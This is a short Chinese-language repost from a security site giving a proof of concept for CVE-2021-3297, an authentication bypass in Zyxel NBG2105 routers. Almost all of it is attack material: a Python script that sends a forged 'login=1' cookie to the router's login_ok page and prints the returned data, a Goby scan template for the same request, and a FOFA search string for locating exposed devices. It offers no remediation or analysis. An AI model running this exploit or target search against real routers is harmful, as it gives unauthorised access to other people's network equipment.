Zyxel NBG2105 身份验证绕过 CVE-2021-3297

华盟原创文章投稿奖励计划

文章来源:Khan安全攻防实验室

Zyxel NBG2105 身份验证绕过 CVE-2021-3297

POC:

华盟知识星球入口

# /usr/bin/python3
import requests
import sys
from requests.packages.urllib3.exceptions import InsecureRequestWarning

"""
    by Sec
    fofa语句:app="ZyXEL-NBG2105"
"""


def poc(url):
    exp = url + "/login_ok.htm"

    header = {
        "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
        "cookie":"login=1",
    }
    try:
        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
        response = requests.get(url=exp, headers=header, verify=False,timeout=10)
        #print(response.text)
        if response.status_code == 200 and "GMT" in response.text:
            print(exp + " 存在Zyxel NBG2105 身份验证绕过 CVE-2021-3297漏洞!!!")
            print("数据信息如下:")
            print(response.text)
        else:
            print(exp + " 不存在Zyxel NBG2105 身份验证绕过 CVE-2021-3297漏洞!!!")
    except Exception as e:
        print(exp + "请求失败!!")


def main():
    url = str(input("请输入目标url:"))
    poc(url)


if __name__ == "__main__":
    main()

Zyxel_NBG2105_Cookie_CVE_2021_3297.json

{
      "Name": "Zyxel NBG2105 Cookie CVE-2021-3297",
      "Level": "2",
      "Tags": [],
      "GobyQuery": "app=\"ZyXEL-NBG2105\"",
      "Description": "Zyxel NBG2105 Cookie CVE-2021-3297",
      "Product": "",
      "Homepage": "Sec",
      "Author": "Sec",
      "Impact": "",
      "Recommandation": "",
      "References": [
            "https://gobies.org/"
      ],
      "ScanSteps": [
            "AND",
            {
                  "Request": {
                        "method": "GET",
                        "uri": "/login_ok.htm",
                        "follow_redirect": true,
                        "header": {
                              "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36",
                              "cookie":"login=1"
                        },

                        "data_type": "text",
                        "data": ""
                  },
                  "ResponseTest": {
                        "type": "group",
                        "operation": "AND",
                        "checks": [
                              {
                                    "type": "item",
                                    "variable": "$code",
                                    "operation": "==",
                                    "value": "200",
                                    "bz": ""
                              },
                              {
                                    "type": "item",
                                    "variable": "$body",
                                    "operation": "contains",
                                    "value": "GMT",
                                    "bz": ""
                              }
                        ]
                  },
                  "SetVariable": []
            }
      ],
      "PostTime": "2021-04-06 10:02:37",
      "GobyVersion": "1.8.239"
}

本文来源Khan安全攻防实验室,经授权后由张发布,观点不代表华盟网的立场,转载请联系原作者。

发表评论